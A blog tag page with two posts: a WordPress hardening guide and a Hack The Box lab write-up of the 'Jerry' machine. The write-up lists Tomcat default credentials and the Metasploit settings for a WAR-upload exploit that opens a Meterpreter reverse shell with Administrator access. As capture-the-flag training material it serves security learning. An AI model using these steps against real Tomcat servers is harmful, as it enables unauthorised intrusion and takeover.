information disclosure – Michele's Blog

In this blog post, I will show you six easy tricks to improve the security of your WordPress website.

Create a new administrator and delete the default one

Why?

Each new WordPress website has a default administrator. Now let’s assume that an attacker targets my website. They can easily find out that the content management system (CMS) for this website is WordPress by using a Chrome extension like Wappalyzer. Then they can find the WordPress default admin usernames with a Google search and enumerate users on my website thanks to a flaw on the WordPress login page.

By entering username=”test” and password=”test”, an attacker learns that “test” is not a valid username. This is an example of information disclosure that helps threat actors to enumerate the users on a webserver.
WordPress should change this message to the more generic “invalid username or password”.

Knowing the administrator username reduces the search space for dictionary attacks and brute force attacks. Now if the admin password is also common¹ or weak, the attackers will take over the website in a matter of minutes.

How?

Add a new user² with role “administrator” with a strong password. I like my passwords to have at least 20 characters (a mixture of lowercase, uppercase, numbers, and special characters). Then login with the new admin account and set-up 2FA right away (see below), and delete the default admin user³.

Add the recommended security headers

Why?

Security headers add an extra layer of protection to SSL⁴.

HSTS: This header forces the browser to do all requests to the website domain over HTTPS.
X-Content-Type-Options: The browser is forced not to guess what kind of data is passed. If the extension is “.pdf”, the browser will expect a PDF file.
X-XSS Protection: It will block the page in the browser from loading if reflected cross-site scripting (XSS) is detected.
Expect-CT: In order to prevent fraud, the SSL Certificate Authority has to log the certificates with the Certificate Transparency (CT) framework.
Referrer-Policy: A referrer header contains the address of the previous web page from which a link to the currently requested page was followed. The policy “no-referrer-when-downgrade” does not include the origin, path, and query string of the URL when the protocol security level is downgraded (HTTPS→HTTP).
Content-Security-Policy: This header is another method to force requests to the website domain over HTTPS.

How?

Open the .htaccess file on your server⁵ and add the following lines:

Add the following security headers to your .htaccess file.

Hide the PHP version from the HTTP Response Header

Why?

By default, the Apache server running my website exposes the PHP version in the HTTP Response Header. That is, it makes the PHP version that I use public on the Internet. This is particularly dangerous when the PHP version is an old and vulnerable one. An attacker could look for exploits against this specific version, and maybe get a reverse shell on the server.

The PHP version is visible in the HTTP response Header.

How?

Open the php.ini file on your Apache server. Set the expose_php variable to Off. Restart php-fpm and apache.

Enable auto-updates for WordPress, plugins, and themes

Why?

It is important to install the newest stable software releases as soon as they are available because they usually contain security patches. Enabling auto-updates takes this task off of your mind.

How?

WordPress: Go to Dashboard > Updates. Under “Current version”, click on “Enable auto-updates”.
Plugins: Go to Plugins > Installed Plugins. Under the column “Automatic updates”, enable auto-updates for every single plugin used. Delete inactive plugins.
Themes: Go to Appearance > Themes. Open the current theme and click on “Enable auto-updates”. Keep only one other theme as a backup. Delete all other inactive themes.

Use Two-Factor-Authentication for each single user

Why?

This adds an extra layer of protection to the authentication process. If the password of a user is cracked or leaked accidentally, the attacker will not be able to authenticate on the website (at least not easily).

How?

Install and activate the WP 2FA plugin as the admin user. Force each user on the blog to add 2FA to their account without delay.

Make sure that only used server ports are open

Why?

Open ports on a server are a security vulnerability that can potentially allow a hacker to exploit services on your network. If those services are unpatched, a hacker can easily take advantage of the system after running a port scan.

How?

Go to https://www.shodan.io/ and enter the IPv4 address of your server. Under “Ports”, you will see the open ports. If any port that you are not using is listed there, close it right away.

I hope you liked this post. If you have any questions, feel free to leave a comment in the comment section. Never stop learning!

In this blog post, I will explain how I hacked into the Jerry machine on Hack the Box. This hack was made easy by a combination of information disclosure, poor hygiene and use of default credentials.

In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Jerry’s IPv4 address. Here we can also see that this is a Windows machine.

We first scan the target machine in order to identify open ports and services running behind those ports.

The scan shows that port 8080 (HTTP) is open. Moreover, we learn that Apache Tomcat 7.0.88 is running on this server. This information will be useful later in this hack.

Open your browser and go to 10.10.10.95:8080 . We see a default page, which is a sign of poor hygiene. Moreover, we also see a link to the manager webapp, which could help us getting access to the server. Let’s click on the link.

The default page of Apache Tomcat/7.0.88 provides the link to the manager webapp.

We are asked for login credentials. We click on cancel and we are redirected to 10.10.10.95:8080/manager/html . Here we get a 403 Access Denied. However, this page offers us a set of default credentials. As this website has poor hygiene, we will try to login with them.

The “403 Access Denied” page provides a set of default credentials.

It worked, we are on the manager page. On this page, we learn that the OS is Windows Server 2012 R2 with amd64 architecture. Moreover, we see that we can upload a WAR file and deploy it. This looks juicy.

We are able to login with those default credentials. We see that we can upload and deploy a WAR file from this page. Let’s see if we can exploit this!

Exploit Jerry

Open your browser and google “war file for tomcat 7.0.88 exploit”. After a bit of research, the multi/http/tomcat_mgr_upload exploit on Metasploit seems to be the best solution for our use case. We are going to use the default payload java/meterpreter/reverse_tcp (a staged payload) this time.

set rhosts 10.10.10.95
set lhost <Your IPv4 address>
set rport 8080
set HttpUsername tomcat
set HttpPassword s3cret

We get a shell and we have access to the Administrator folders and files.

Boom, we are in! Even if it doesn’t say NT AUTHORITY\SYSTEM, we have access to the Administrator account nevertheless! Now you just have to find the two flags. I leave this task as a challenge for you. Tip: they are both in the same folder this time.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

Tag: information disclosure

A few easy tricks to improve the security of your WordPress website

HTB Jerry: Default credentials made this hack a piece of cake